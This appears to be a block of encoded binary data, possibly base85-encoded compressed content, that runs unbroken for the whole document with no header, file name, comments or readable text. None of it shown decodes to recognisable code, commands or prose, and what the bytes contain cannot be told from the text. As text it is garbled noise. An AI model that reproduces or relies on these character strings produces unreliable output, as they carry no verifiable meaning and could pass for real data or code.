zYjy-+bc)1F|03BRzGNO`u95ar?1OWbRo<*gzgHNLZycJdmc28Vm2fO|FUymoYR+^| z_QH@0o*$lRBNc5Q9PE`+;+8dU7qM)Tc^WuUI4&f1Gw72y5*8?Nk~T2IEN`6NSt==; zB_R3Q|Rz{P) z{ubm}iexteM^LEc7L!L8(XHt-K9bE-94PJ|dc`%!y)g9W;## zxA&CO$j^sKmJ3dXd&&&qPhT}nU5rZ@YfAl?S4Ig^1t+K$qV=8x<~BRlWH2klUQfI$ z8$&>>!&d5UgDJhZjzDe_TIW_KSePKCnSOO7;$u0zJuY+PDuGC=_&k163^zZ0ZYIle zCcC|z2uayLUlCPEokmGLrbad1LS1uyqP4MO-BHrnbGCxA8%Ij?D~+19qf%Mf_*9KL z^KsXuph9Wv+sa*)(l6a`Odbu|APv5Rxo9$ts8S6SL?vFS#P0S{_x8M{vA4ojlAqJ( zhCiu_3u#I!X-Z}AQ#Q>BC{3J&tKo!8s|PCKN(~|UjmbY(Wq&>@tJNiDq^U-(rOv9A z@qYe&sImm>oT`;H+x&cbAgYpAaz*a2aDkh+XklUav`%a=)R zt$w`%Az>EaRv&uDue1>?y6n7$9Xqr=m2|v} zbW|MYJ;>!iEB5|J zqk?p!k%qsmEk+w*!9xku^g48{2O2}9YELj!B+8a!$@NlM_4p>{k|gxfoFEF#OVYE; z83}qh1$wzJbu)rm@?Pq_omo!UnDtxGE5g(-Cf8RhkSG<>FDsBJA=fQrT`oUfd7hwO zS)gCVvsBihUo)^;^%8s8L0@A`J$pmHp4^~;)u3@>wPHd1t>T)Jkij=sgO&t?w*~i_ zb%T8LnWpCk9UBIn#|B*k%55EM-4Ux@tcHC;hW$#0!w(D#KCQNE84f2HjuaS<1~CqH zthc>1oY*j&JT{z?!Wzfi2)#9&Wi^@;+UOuKnvpVEbTV2B+Njdnn2s=7eQC7Tu@RMF zG(KRod2ICVUb64EU^Iwiyu)hzUdZ?p{^qvSpCtQ|nwvcl#)mJBKXq&-rEPW(7@r&) zpWbeI&TkGOnOv}%d=@gPC3tr(W%A9*7L6TT_x+vj?4KWRqs(n`RUzW)JVopjhUV6y{WH z=G4OGG|J|*#^!X+=Jdhl42kB9h2~7P=FFYuER*J}o91jM=InRo99R~QC@eVHEVzU% zxRov7JjND}oh^8SE%*{G_zNwb)LIC1S_n>B2yI#jpIC_8S%_j;icwgKvsp?ATS_Wh zN*P;9J6p;GTLyWd3WQk7*IKp~SSFQ@%GQM`Wm_uTS*mX8E5Amt+nO`pvINUnX&GB- zJ6q`lTj?fR=@nY(*IF5LS{Y7S8Esk_pIDjPS(##4n^9PsvsqgRTU#nyTNzthJ6qcX zTiYgD+Z9^d*IGMtT02f!I~7`S9PJuUo66HB3!Ncy%p=&c*?213c)qssa^7>dw()Vc z@lD+GEVS_t-qY{g^PjW{8nn?rv3dH@I^?lUFtTmH;$B$iUU>OlMB-kg_g+-yUg*gl zJX(7%c60A3#eSUeUX1j9qV|50^?tJVeoEwiYUY0YJ4r`%|*dJ#XB#X#7*MpGST4vfOEJ+HvJxvVT{!q}&DH)CRB9vBz&X z?L;2FD{Oy{9MubVW#sL+q+X^!!;~Z ztxwM7J-Q#Yx%aVLE^D{X*^V!)S3et{-ie+bIh|hKFJdOR3_Wl;daR4kfBNI~X&kld zo$}dT;b{}r1E!V}fXlXmxC`1d*RPX?2wZ3J2~~)eCyQgQ`bcibI8N0Py~+O~tK!us^%Y_0bD#4k<)JT_ z?9JPEpB3KBBiDN!D|@K>tUr1uu7&;Wy_HwA!a2OoQ}o>zOP7n4IWO_2?o>A3SbJW; zrwfuxu4Yr;mT134aUH{L58-DBBBq~obv!Yg4JCCvfY013kklTT_?W)>R-57Dxa1um zV&v?@=TZT3tpK_0xrIFSVNCL=GxC%;{aQ$V#k_Z}Z{y(){}PaN1s|R8kzTtL;&m5$ zryj=c87gwc%zGBWe*abKM1=lp0zFS`mTyLuy^haOCa<5Rjc4NN7masb8YbUxGQQeJ zT}H@UTEFq~Ht{RA*+{oJ&3fnOMs(@^&_nU-cO;B2?n$4&I$uk|y_z$w3&+-r-(63# z`irk!%7A~!$oh*E`8l|F^eA2CvVZq@=I_&`>9glczUSZiZXM1S#ueh)@h;&0lS&sn zpc^}|=V4$kdthIb>n(p^zs}7kWaqZKPrG)3M_7T0R{>kKfrCUh5z~P~S%LkFKPFsm zCg@S8*<(7U9H&tN=VWfClN@JEZnv;p7o%?HPH(1?TyO1yR@sB#YfDEXr$1&MqJB`m zSs}XHc^b3r67(VXcAYo)BYW_s&)qB2yDguaQJ=egm%I1(Q_b>9^sdM1s49?!Xnn zJM8e!^no9;Zcpgpr&D)dUEs%i!Nc_MU7w(L?C_gc@GF#P6A%jS7prL{t%SR{1wwrV9qF(97Mqh-kZp(vK3~)o~!RF=+b|fOjO}T#>Aa9pYoigFgrdVD&O?}2S1 z@Pl_}cra{eaK+H;ykfROXSL(@O$6Vpm*c;x(Ir zj>p+HUFY*IlABK%k@JTNa$CivDv)W9bX^Ika{xO?L%YPVv%=Xfa^V?nBEMq zWjtc=8=5qwC*R9d*T|7*Gqgzi3)FuYSrtZtNwcY>2oq@GX-1N-b#a68)&4(<&N{BC zw+-V<*hX#CMmkEm4cdW-l+xWPEum5h+vx5NM>o>aj8albNs$mGM8WupAnxV;`}}dv z`8>}#pX<5r>;7KVn>wnze{7=x$*;=7;3CxMM32&azQPCGaoI&$jLWvZCeY{&2g3dA z?Ns_#uQ`p+uGc=nB$^JhFJ(2?#m7ehCln6&vQO>y?=l@A*rS znUbDVlAXT3^t5GqVY^WF?R@-{?2Ian^0nDJ9M7)JX^A!*z13N2Z=E;LQNF%tV)g9$ zI}6Xg$36OHN7t7e5|nSOxD-6QvFcve5HN2Z(RX9rZ&LZ@`^Rg~Zf<<*7yq>pe136r zlR%>)w-q(H{&GH+qhD?(N%5cD$26V()NO4u75Ptjp8fKli$cSK*39hw$?sPbgee@< z)V+DKT=wFh!k6Yr6~&{V9-p5_?T7t}-}=t~Deg7I&?}vca)c{=A3rQmoShP-DE*w( zxutyahQ?d@*NW$W^6&Su$;vaEp|@22>=uOgFK&OXS2;WCp{V>lc{ufNdU!JY*1tc8 z1C;Q=pYvaCQ9wduAY&6AKx+$RswP8anh4a1D_{c8rwmJJQakLuu1e(KmW|=mX4~*`FlFDE#F?MhK|~{qYU^ zkAs&nqk2R@;#;hdC@)i)(5Ns170=en%hFmsDxQu^;1A$M4-37LzB-%0D$B<1FwOm}WGk))Wqq7qYTIja$gh6^sW~GvVh*8aiNlQys<5K}KC*etpxfV)x zN3VcHK+UAh_m-UgzXDPb!cz{6t+}t1uF7Q8Ou5Lk=DlgFSSc2sb~kLzf7g5UMr+Nq zw|{HF#^0-Q!@_U;(pw96KJqKf*SvY$(pvQOsi4x1@Y~?I*5dzq1yz1%De4`xKL7Xk z^T{cEhQQcHda(myxhf5hkZCKScj09Fi)@Je2SO5u!LS<+5(%zT49=t}w9Kls%u{Cf zOLGtpZ3*ah?jZe+i2Lvu+2GmZl1fO;{*`o%==|?nHrUIRD$I_)X1`q`XFP(smI}9& z2Ed`!BNpWX(NNeB(&xAUgG`&lW!8ZhVZc{IGchWKBnivw5VMEEYxj9gz@K6BO z3}EgESoscOgrvbDSkypJ`^bKT1E6cwgqAkd6TC`l*7<@18&#WPQn5=gF``X?6v0~j z#Jqgk0qB1RZ}6}a0EZ9(x{qsZOn4ilf(DVqPLGY2e8axWmIcF@aC@%;p$S23a4kBr zU5bjKehRee7;V4}*~31tA2s+DdD^tL<9n&h>>Z9p?SE9n4uVKcIXJJ!lBPf!b6!xJ z<1jr0Kt+rsApKp`UB+G3s0$si0n0d7qtG__Ak{`FOq_NUOU3e&ry@qm(1?a)H({Vk zYl|H51e!%7NcPzHzkcCs8`o=?AX2)R#Wpk6_mh zjdoy)q-%Y0=NZe6Nz*?NgKd!^*e&3@gxdLn`>89%6XM}CW@==#x z!}Y@b$Qzrh44fCk_2_@8q2NNg$gmDx`k5FGbRONxMu+w?o?14S0Puk|jzZHfRg*vhNt9F7_)h8yjJvcb z@b=m{DA-Jwy_D`Wmj<%aW~!T2!tP8t_CKcy5*n2pA_FwVxEaeId;`n)5;-6y0`Zy` z@cT`+L@W_lfxI)qV-N?X@YcbpPbEJ|fuxuq3@))3baUcJEv#d2wj2Jkcx>OHBj0Z> zahpm8589;QW9ikx+RFr zLHc~vE3hGM>=0{q9^2_AjuU@*V=Da;p3_ZmA`3GDgrbi$tFb|*vrkXkqB#M~{{g4P z9V~+ufz~*dMjpO@L+1CkC7V=xT`<(yD}tHJ<`v8$QYF}OmhD+XUn=V(hjUlkU) z3BT&7ec`b8$An9hE3aY!tgnHt#$hTm1wPqRRhI%5?tJ>SQ3^#P@lL#7$N^eAl9_mG zKXN;Ptn`K@A0DYUS0*4<2sg)puaR+yWj91@zB#Z0*2{3#??QRFtuM;i$nVnK^90O^ z)&jWWF0)?_Y=JIiY{whM<5{3W+zm^j@xLKG*LSvDrp79HU=p8A`}4F+vYyY*kUTkH zv=pL*CcCUCy(?owMk;}Daic{7se|A)7e@qyv$Kqf*7ZiM%{O;!wavEtS7-fr$|lI& z0r+t+>S%eaM%5&X?Yat!D3R<12QfBo(NXd71leH%5 zf$t4L&Vw8?0w!Bi0u zq78H4O)kBnQUJl_=0#Q6)0z*ea)1+`E2}h zG3x?07wD`T3PdCD3G-o%$TfAY zPT)sF#__uumF^zWxXTUob6+I;s##`@xxX;}hOLe1_`bE@uCq@C)JqtE-{p)Iu)ia^ z+Fp@yf>!R>u|9hDMAhB(NVSg0zHUKm^WdXCb+_qtceS8^GH>9oKDrY4n9PG=b(9z2 zrOhr>69!r5<&_roz1l5QLANR_S(muGy5x5HkZ@zUHzqDam+?jMSAnR#coQ5@pI!B1 z#JEE19M z^=i&+2W@fpo}?_-|2F2M0X~DS>WGmA1jyWW8<@(jR2zw&!eGdR#wQgzajHC6G5gip z=g~lFAu@QT;9eMOqrVv&jC?;HfA0o9BX9qHGyp7jnA+#E*S@bdQhS3D!1k8_Qd)wT ze^A?G(WXN4X0u||a(Q44W_QZE=pJGL!r;A6SKfeXY&m$3g~8i{G2P6Smi%M_?#iB* zO=jb&pLitn+w*jf?ySL2l~J`FB580_*L{JHt0Lb@nlhuf&)7l0FyNxV;S8~i>X9lH zHrsGjFi>@obHU^6;4lTQPWITbjiUgU#uw@S4qgGcnuV!Ne8sa{i&B&D043I6kLwhc=LBOF_hFf|fS1zGIQ=P+X=H{EenCJMWBHVGK3p*NdP zTXy{^U&LHk;z@mj(|3A8*)kUkM0ln8g)iB5l7-B)_q~Ce{9ud+OoqpOYaKRISSa3zOT-(E zdSm2pQ$#Q9Y2jP;J?h&>7Mn8nyYu%aSXcb>spVMWwuL8F1+`n2L8 z3}w7DS-X6rLI2QuQZZw@jl)1We9Z<;^E7xYIIKaz7DFanVxzWB&0mEw+uy4tk^`h2 zE9q9ow}fxE^7523lL=lxFAne*oS1^-Gz+V5hYT)-Wi}WPx#(S&#DdZ$+QrpJ#$QWF z!fAUyieqt$`>#fFzVVXZQR}h84Z$^EW-)Kq;gF&~5Rfx%K8>uwFDN2VtOF;uk~1;L zsmTh6#ks&K_125R27&^rxX0jL0Sy99th*^p%Mv{H*eJziq2xcDTz)0=Ih7^RC?wxi znZv%dG*zCB_nOSHGL9`1xKVuP^a;MzKn8#(4%*fUaFQ{6+^{BYRjh?ap0Eoa$k8vC zKZunYwqp$GcXO)k zz#iV8E+hI%9g>7p#mJGS9Y%LP)8jC+1h2UX((@yKY|u~Y^Y-yy8^BgCU`Olv8B1sb zb4nbyyv`m!>p|t!P6ea3C_<1+hAD_S%Xi8PmYlzH)+qmbgT8zrSw)?=<(yiNx*5Pn5`%P zu;WQ>=@MWDPR03!0?%afPtr{zTS{#hxZ;hXe-PbDxjNaLFP%E(X(`*cPl1AB&+WY1 z&|;n1a^~9Z!3i2c1jRp+&qsASJeok{TmRH%uH&LBnys!bB^Hq}ZGW8gO3!OC;fqce zyhC~(UZ)d}*=c$#{FXdqEgtm$SD`$Dk_%ZP6^Yx+d8Ezr!-o|PK_Ab zR{!3>J(>Ou5SHbLCaNn3%nmBx%Cd2p7;&dA?82y6i=)Ns?{z=c7UmkOt60a*EO?rX zW7RMI?>ssX}!-jAU*M4hK*{xNLnwGn#WMEIypug_TChR5`qC215V<@W;Pr0-w@x5NJ40 zGZtCO#z+-DZ2>?zf;FgaV#uc`JS^JriM@JLY^mxUHW0q;8omseBur->hF^MF?@Q(=PUXis?iWVaa~J~TxiX2^(=k-PY}G2E?T;rs^jBAs9zOi zJ-_tpRK5T?`w>TnDwg`JyhDO?@^zp_Gyzps%0RG-^3f|t$j$InJCHLzO|D@hI(>vX zQc0_+BwT?|N6Y~fzQM_t)Tg4hrlUA}b|xy7TfHjQvI4206QPbTI8Yo`kX0YfWX18y zO1sKJt}_}i@uw|&cpysYF=tUpEWkZnW{DCp7A$)>jt@Dqhq%L_=0~C>32lS=EPH(jlNGKQDJ`0ZPibzb&}@w50eQvP>G}rWvs`y zR*H1~UFMV&B3Y~B6W~jxr0)5PT!9|k7ffUaROr#LyOC&2#e9EeX5z?hO~xB0ci7MF@aVt%0yYdEMwMSxd*S zQiroY;V(+&N=Z$TYbpm8N}N>_V2+Hec$mIIH8L^mUQMKyG|SjTvMcerMd71uccTJ@ z>za)GiE7$4j$MoG4Ph4-=uJG7J9m>vr-GquMK*&}K{vl`H#Oqqn50v86KTY*y>7c6 zixAl}*G>IG%+N~(r&;Pt!^JAA5nr#B&6CvRn0c6Fy!z#Pk}4RTA{S%`2VFFMnoTz; zwCRb>Ib}|pZ!?qi*;JRmMCMsD@N3Q^^|&M1Yq@?#$nK^Fb~aS~0A*zHez?ZZb-t!Sq(0@)=OqGAb>igqG<;xCpIoYs(-#d~jd1*V}kOP$DkAki? zr|Wj_4Y|Gtb`u{#wJyaBz!LnyumUmFmNEz7 z?*MHpm)lFG@xD-&h}nDLfS#IY`f|#bGL&E5(cTD7{Wb2s8xNg&=go-eKm2wDFCew~ z3f)rQ%RP>>b~u=4UX!-xCaZn#8e>-lD@>K`x=~PWQYzXY(g$%$E@z)1*pUe)bW(3; zjekR;3lRVi3=cKL#z2+S0mcV7fB+wontcRya~lV-1i-0q`?$_+^qo&Lq8eik7AElk zjN6GCz?UR*1|m1kQ8Bx`A9H>~L~wHJ6X?{&tp@gnerO8Wizz_O!&}*f--OLQsharjJ;-h30K; z#UbpIok&b`s4OBw=ldp z!h;d)2=cue-2Kpup69!|WjPHC&X#^<@o1k&37ykcO=Di(>&k{bYZpSAH@1qt;RDOO z{;6qn44Gx6KS<@mo#4&347K`PVZp91WNABfR7}*^4Du!K?}?I)T;r(iPCwpv7p*X+ zx~ruMEe%UO(WeZ5r_Q<p3a$aEb2mJ zAv0-Jix=C&iG@s34C+cD{bM1GlJQdeODVY0X(jUhY;_ zYa6UDozwJkONlW(zDAYL@NWe^5jmrwL(emU@a(Xc*DK-~15j#gAu5QnHS;XV%-g9v zrx9duBq;>^%T~LeY%SeflJ-y`A45-GHv`7r4BD9)%b%P`m<@Oc@}R%NJlo_-{{r-u zOV0yB`FmfrcMf~*Rp6>wekIt03ErkP4qRX0UpW;M@I^tMF{{Rct;uq9br3F2hqei> zfC1_)BU(!=sf$Fe{D4X4Co zw>4aS40F$410&8L@HWL8U)>O1?Ne?na?C>qi9ldLwU&?h?VVN_z-M|2AMq;qCc;Ck~o;HN~ zDziOPQ5FuoGj%i~Z0na`$GO91=Wp#;$aoxy=TR!gu`h@awiRNP2uO9R|HxEGb+4^A z;?vgZ-GI!f!3>tx;q}IMdfRR{RoKG-iODn6VTKh0KH9j+6l8Nt7NLuP;{tQ0?oW)~ zEGn&kNNP`%)-RJ&p!c1JHZE_U{3}JUm{%BcGND0V{^|w^yTAQj=G1CI`3!PCC4$+r zr=`BwOYl_Fa-V*^N`F%fIV-9f5>B|u6At^*XK|t!Y;^Oc%O)hb#80clu{|vN0xcPM z%nf_^s}?UPN%%Xu6ZcALYJm~;*eD|1h}Tn=(zIN8#|$#E2~_d#TD;@c@fkov$u)@^1?TgeOo>)HZOwQ-_McOubpbJ;%e~GY-)x~u@jF}e~`Lru*_#T zjfeT_(4gIU!}$zn#IHGhl>9jQ7CKy^l6-u3!6yaZZ z@?!}>BBxro`xP(*bx0|q)4zj7JS1OK|A!zO>gJBKEv-+ zhVvPQ0mu8tQa^q87|a`_nyyM1|@07w|)ljm5<}GF}I6UdcCSbm$D7B#gfT zgw+22d_{k#c5fZ>xZ3eK=ZWmL8oAnu>0Wui4^+J$q9kOcCS=nDuN#60N>ySGG z^us6X!U8^DI1kmXnONiawT_zPaM=$dti4Nt0XP>eSTY)D)vaOii3zFDhR z=~RzP9ig?u>Ig4tP$X-x&dk9irc`(PJ&PeVkIw_f0Ih4 zZr`4R#Vcg_Pj|Kbk`(8f-I{fEs6!G5|)e7AXBD`}C#)M+&!q{i1WCTVovO z{^r9Ct#R(3mr#McZW34B5XxAKTUA<-;?zPu;FnkQ9@#UXllTeil@*x4DPExyT_yu@ zrC|Cp8tbFwiKvtVecB0t(F6{v>t+OTWJ-TaXPG2r6lHmgU1kUH8`TJeNs8MX@_`1& zOF=jlKb#48ko}?39Rq2{bbw6BZPd0W38ZA|t-v*_z`#!{=Dc|S6Nck0>Y!4gu4VM+ zCwDATq>&DQKy7M{{eA*!6DoylL7DgQK#dggk5mOP)UZ>6_^m{u0fiC3p zyod*j>aA^nqpnu{@!K#$5M?Uy7N-Mss)-+YLR-n6_JUam|I21CLKbMxN z6GUH4t3rILRu9N*zkaxA`;Eo!M|%f1A>;3E04$oWaoaAy)4pp6m7S&V@qx%pSqOqv z3^2$5iE{_>=v+wA&22Jpc8K1%`>Vf{Z)ytLjinRO5}PB@{KGo_dfXwQ?_hK(X2~Kd zcb$|wOdwed-mYSGz8WqOrfxCWZV4TBr&)GMH{1d@CH722X23gNx0z(8 z#xhy$RkA1RS+B2rr z0F}^6Y(l2U_bh*UQ(kX7iEllWeY0>nRu9<+1UmYn;$)|vT>8rV`ON$UbNq*i$ge|% zEg&iW`E6zgu$+P5pAJ3IB@s~0Bk#IMEC@KHlgbQ)a^pwuo7uB3J#bli@(>*uU>5kh z3Bqj;{n-u?!H(18RRhtYrm0U7Z>B9{!4sQQSk>St)(2%dA$3b3FVLZ_W}z>0LVK1% z2hdN4(JvJ$?M9cLzC}NqH+!~}^K1?MbUX*KZWi`AC+u)3>>E1#hgtaVobdCda0(g^ zHpf%v;%S!g3>X5FIRTwZ;8-SH!4Ub(iGsOA(Pg3}CgQT~xRn#3xEyf{6M5S_@-8M4 z9F6F(r=e(?N15eDSuID|VWOSPqaWl(doD*m#KZ)c#{}lagf7Q~V`3xBV`Fk-6P9CB zFmV~?aXGnh12oLo+Pi%FU{ zPg=@NT3e159!k31DL!Tvak!lP4U_Uij<|n{-tLTCBBuN@Po>UFrCCW`TuRZxr0)Dq z?}o8m1Yw#$*8!jB)0rA zi+oB|R~R_Ysf{=GT&|-yFTZD{V1TW#E~lUiloxDXfOan&wkTT4D_YC*W|J422##rI zD`pTbde8R!hsE>Xe;B^8iCUlLYz0NWkWc%Y_nd*fgvqj`sH=FuF{(hG6#gfLqdS#0 zq(qXvOxCh&cBr(D81^HO%Z8ZyorY1Wz;I$!*dYCi0I;Sy9kX_f^)ZxSqMIS*`>{o1m)T2gaX_c=f9 z^I3(cRomU3{0|D(WjP`^)|v&n>oP3T{>yK3vg+tVw~IG+h|ATxFTYR>Z94kX@qnW< zLeW1wbUQYbcy5Bu#3IJFIHyXwrh(mMR^3$v-F0i-FF1Ny3%bX75SchME)T&yh)q{S zd>ZV1%h5M))wfj8x3<>zfun!Ns{eCA|KVEyH;#cHRs+8a2F}+8C>-QViB4TerdcO5 za1JtA526bPIo1cSa1QZV4+$0yiLMVxat?n`M08uB+i*0ry!6>**qCaM&iV*Nk8`wU z4VGvR-^Me@bwAC((r@!{%dEe8$oV?J`gLI8>(KSr;hbX;)?+b+V+reHDV*aON@MOy zRO$9~Z8-GyCTC^ggwguM3(mi5 zzEW3?{lsj^MCg;2-xr@~qy`qr2tL>8aXLq_5MlGj-(X$s# zG}}CgnUcBZit~Y7Z}UQDErPkXfxY111;4JB92biQHY+h}ZK5k3PVXZr8C>tE;Wg(? zuc|n^9~UjXyqFj#aH?J8MLbJ8fBfzQvs%aAn8Nicr|A8!vxXgomzM8E7v78PJ+tRM z7qhil?b}{`Znf6MwRvxS&Bmr;I&}S3&+^go2HduWiTl-V-+Mk=hrfBX3FqtQE?e^# z+cEFA!nx)Y!^A%EAet^dfHywYaIBSai2b*^c}1m3^&fGvXg=fF&aBP$!!U+#UF(lS z7Vcc^qHNzkcwdX=-WFHbIpo@Yz*cPbUM%-tbIL!_8-*YBiVuERuiY%DvQqgF%yE#y z@u|80lUeWwzv3@}mOIb?WLSjmhxf0VuzjeJ`_kOC@|t^PCu}$F;&3pmfl{;~R&M*Y zj{CSuarg5@aeM#1a?j@?u6G>WtLP7(8}ep<*d7IUAB|s}Oor@n6@3$=REj@OUMl|P zvT2S{@~d{S+Ni>AP>ngE z&1<>dsZ3!#B-6{P-Hx!@mvHmNM&Hx(vkMxzrppJR;ZRAGYu+ABd~5l5s&(t#IBi|_ zZv6j^3Jh$v$#p9Mj;--q+{ugrpQdxA>?WReDRg|vm;V<3WG|q}z0K!y$F#zqn^w(5 z;xvLjj{@^4+sogtK28?gN>S-M`}Jk5C!B%8 z_qlUX_~xk3!0*vN#6MTE#EQdSvbnB1LfND9J?cs#-gt_4MKVRU-s`lacz68Cu?jaJ z1agJtChZoQaMM?Pc<`8@iH;wU-{o|hhic}>{OpR|wmkP&7B$Mk8v$Bn?P6DSv?VOa}HLkbqJ^k3$o1P*TSqJZ|mzv z$Xd${-=$+-wg<~M^u2R!l{|v(7g|ch*HtF^n7L&A$62OHYu-; z&A^aWt2{kk*gAKcR%T2HH5}3N{XneX;r4Y>8|}Q#`-Jabgs#$(q4UeF#-@CU4`$W*E@Z5? zi>)Lc9C}z)*E=sJ_|~i6qL!OqHlz#LD^0l{vOnXh!nHH_C%Tq0RSn*IJRLz_%uJxm zajkRU72c~v-R3tyqCGWLflzh1oep6w+Ci_4pz|V^51|w~_pik->uY~q<7j-etzh-< zV*9y#nA_=+=Pmietd|N+%PAk$FWT!0?uTFe_aP;`-~R23{=|zP;bqIClaJR>R<>hL z>ehg+fs6@s(9{ze2|Vq+&#{-z$fhXckwJcb9%}i*&-Gbs>LE^L8$oSVT|z5+PZ@L! z9*afE|0vpfR^VAe6Oox+S%b7yVYjT`-o3rjkP`iUm~Huc%m}}TU!3mx)S-E<8p|1j z+x}V{pzHO}9tL^eb-0L3KTK{LkA~IwzLIpb2j>+IQ%Pf?6c$6($fY1;N-uJ*e4qL-?~-{YU#qwACGo5$=-`=U#h`(0IZc&0!%F7C~v z+JK^pf?YnRu2De8>)7dLe)O%^xxs$ZlI{E}y8hdV#`-vC4H5=Av6uJ>o^h{T<`a;o zO4EWBN#JiO_eZEtcxW&c8fzQeIfPGYS?Xk1dgaUCr6`O&XiP5>^RCgc3*is^Pp6W) z;C=Qs8#A=_yUmStom);u90ZvJ$Io)rtZnv_Q5{-0jeUhCG~+~{y>iQxc3S-GwL5^b zFv>sj%*pgxmB~bWuY2RQF4yNQt`g5s>E&H#^&y@+|Eo@8%-~fGKM$#`^1CtB3zK@H z&dCych6t^ST>0`;ggF208iCLXqi^H7ZPC>+h7DfYW)s&YOc(R5`aa$@V!!jYrafrF7bH(SIF z*Cr}K10g3fS&WSk550D*yPiSbn&lD0i_hasf8CXe0T%p~9=`44D zO-hMK)0mQ6luW!d`^txXrhTCAfEg*nGp9SmJM%jQzY%DP(PG5x8!o+6JUWd06}ZK5 z81!1{tMsslZu!FMX|6I0SB%RrBL{5>4R09VdTLIh^l9y=#QkwkP=LM7%yNhPe}2{R zUv{Muf~RaZzE@9q_2B$1`VACi^zZr8`|~^S0a$$v>vTDC{@!`DXrq}1X^Fx;BuxEv zlr3RM+EX83nYIgi5o{~qaPvdDKtCf44f!66`NWBWFaKa zAmCf)>s$2xf7$YlDfIICkm3hKBLWT8T}_$9G>D#L;nm$riPzya#n(n0;2)(xk@@G? zoWJXw+}3KGbN1iMMW5~KK72H;eEnnP8g!S^0{qEZpPUK^Ox-r-Uh%|yeC)TxFG>IT zez0LlLR`c#zrW9DYX$x9&dFzAkCO`DfAjfmM4kVYX1!zCn|L_~^b9+Ki&mO3ILYjR zeDVEywtV8~)0zrffuRp0-2P_G;#uIaO_w_PWPETI|4vZA)7Ttq2- z{PQonl$Zj-zo8$2g=DzjDSf{LXl}Wse4=oFi}HZO2q?^zI4qb&4(gAkrW>TvwTI>% z3+LO@=tz zc9mxZ?a>x!Pl>@O3gRJ}c+{Md2K5zZY!rS5X($vGB^_mqi85Qpm}*jKwBU<>Mlote zy99B!l3_?ZSdI)<(g(=TAX}xtvik7n+aM$WXk?FMB7=1|(V|i@J~-|UJea8o_Khdv zW=Ti}p7wPUDg)p)2B1>Rv4-x7I^i9y0XHux3zj&lCqDwtshv_khc5ve-(lYh z$b3dp59Dyi+g~E^0ohU%02PXg${yGjltAF2%E2XM+rvvXxw|lleYu$bALUOUXfs9^ zq@lXU5~SRs7u}K~2O+XEV1=1z&uXxO6!@AwvXul@#wQkTgS>>2p=lsl5+b}aiMWhW zA%m3kA+bSEy-P!kef7^Zp_a!qqsO#!Sr8ST2O_SBVIw8O85%2JV>LPZX4NNm-QuIu zAUdf*+9r4%fKoJpx<@ksfK5S4C$tA8&%pqX_Y%nF2~*45uiVlTN)pAj5>@|`%$vo} z!qPtnB`NP`T%uv6NJ)}d8kRB02RX2$RI;*t@{{Uhs@ddk%V<$@CSMokr(4RYX5=*< z=FdoI4W2?Py5ye$h-32e@R3!Oa8RYMQT=rM^u1{S>}qfn@UBN@+MC-h&c+xPKzf@d zDCQK|5|jv1rS9s?I47XR+~IWgNCr(o91mQ;J%LIZZn=$=?aD=Lp77pw72YYnpE!^e=1}_ zVT802U`P~^En^@xKSmf6Kc2g{awXFdnHHS*6qT<&i_Eonu0HpiQJTHNg8yVZ;lC)# z^Tu(~=v~0tDe|#?vPfQmNH7q6Mve9>L3dNr6W|fEAdb}%y4n9%MGW&$sZAxCOGr`u zt4{ z%Fy+daQ|Q*)^VlJP4P6pvHq^lpGi~mA=7!>;USpZ^pyk{0szJ(JpeKXkaDwUkVWo! zBzNRj`8;-mDkzY2AWfonK)>y*s_Y^Ks!}_W@_(<864;+Yj*~EZ$ZBNyfE10cFwI?y zWMu%@vYK-JNd^kFPh*SBz>38A}EDSVvt5}q{@jFQ0C>RKcZ{GreYcpwGyQ8EDV z2ccR8EExZXM&h8Zwq@t7OKP@u4fz|1=NQT@dW*yA4gXhnh^YngJ0VnYhwN*YL zs92Hbypz?!lYvb&VAM<{gKDy}R7^7htZW~PP^D{UtJNI`%i1H2SHK1KNN@cD1>ag>iR=tP2}re0)Pj*%@U4VQSyH_efCA7dnYoXGgJs50*Y;z zQ;3nVL@wpSdB~X(Qp5p$gvVs2WK;V?-x~%}<-&u7|FR%HIps{!aJFmuy@tlH$Mn(H zD?VdA7Jku|v)cI0#LM24iTxeVw1$q=Pv=B}H~|3886Yg7vNN~Z4uMi6QDNcTJr+n` z?F2gg=K@$@sVAJr{_>TmX-Oa_530V?JUUhCO`q5o~vx8x^}RiWc9y>j?wl`w__W z%VyVS4pcu)FLPq^03OD2i9h6o@fUVKRIL`F8GiHAEd zS}oFiKL+Xt3K)Y)9-?6G~azReas6gRS1Ud zSuV#j9a1pX6R8NGq!Ux&lX88Nq21igO`ZtGAX37W&2COycg9&C-3+uFGnMTNLS8aO zwJIwVdl4nDhQq0{NuZAva>@#M7mz+AmmakVVBMS=@`A%R`+f#bZCm$qlBVcYskupS zc(mSBcp{@_rau)5(9TRZS%J2d-f&_It_%WN696rkx4WTD^vz(X=v&TBglRosk#mr} z9{KI*%sVf5G7!G?*AUGpuR)!yec{`JKWA&8s|k&>_g-0`v>>jx!gW zx{gl&A~y90Tl}BmRJ8Ofds+@Aw;`hPxP%kubC8_?s+uxmR7lv4lpD;z6$juQ*Ct}PR-Df;B*8SigOKs8yX<@I$|r| ztpoUksZic)P!1plxYl=+LpPZ7<~^`pftmxE2=qW+1*CHUA{;k?Z@l3U-#3R-1NBEO z4wJJDMQd$bQ!k$-AAebgZPvHHUu(2MZ5*vTb>~C6=PtOOisEBT&XWR_lRwB&7O6_$ zNaQPdJXp4A?B=~u=pe)^sBrcGOxK^R0sw12L(iT;@D_^>v?z5tV4EcpUEAKRRf_sY zBbhqya6zLlRr2LD>A!bKhGW1xg_vu|hS+ta0vRN$KWcxCAv}SR_+ID9?T3Z{su~>C z8(g*fzts-uD1*8>9eRdbIE0qm90)y0?exebCvrjR_!uRG^aw z{3i!0Xk#FR9zdjrP;1FQ(SWkabW35u1 z@&)h4erumtu&-aFLp20&qJ|J;1P@q@yYVtOk{<^WY69u&Q|s2GC)Z|TR8wTh-~g+a zH#Q!lU5#PTp|*fPfSpaR+^9Lw3M^Js^R90j9QEt`~7stT!0;|T;>_0*fw!;GdvtqF&82C%BNPl5?jj`pBQ3ew&T_ zHPn~LV~>243Ord~f;Jztt^uAP;m~FPb_MY9AB|CXqN6^vK^%dQZh|x*U2OZCLi5Dr zd!T@^ffo-85EYI1K|o4EhwYoE3hP7F|2?gJkA=q! z%)n;F59;lZUQOpbT_0it^4H&7=q`a|aj%q*e`TH}#p)d!D<8ueH-!{{50rsC z^dAWTS^_QlEO)l-^={$(|4Oei)==bD$%bNvh<`4|Za z{c2{z=4tu6KmdSFla|&A?+XUe(g;)8yOSkF1{kfdO7fqbhO!mJ5Px)Z9fttCW2k_d 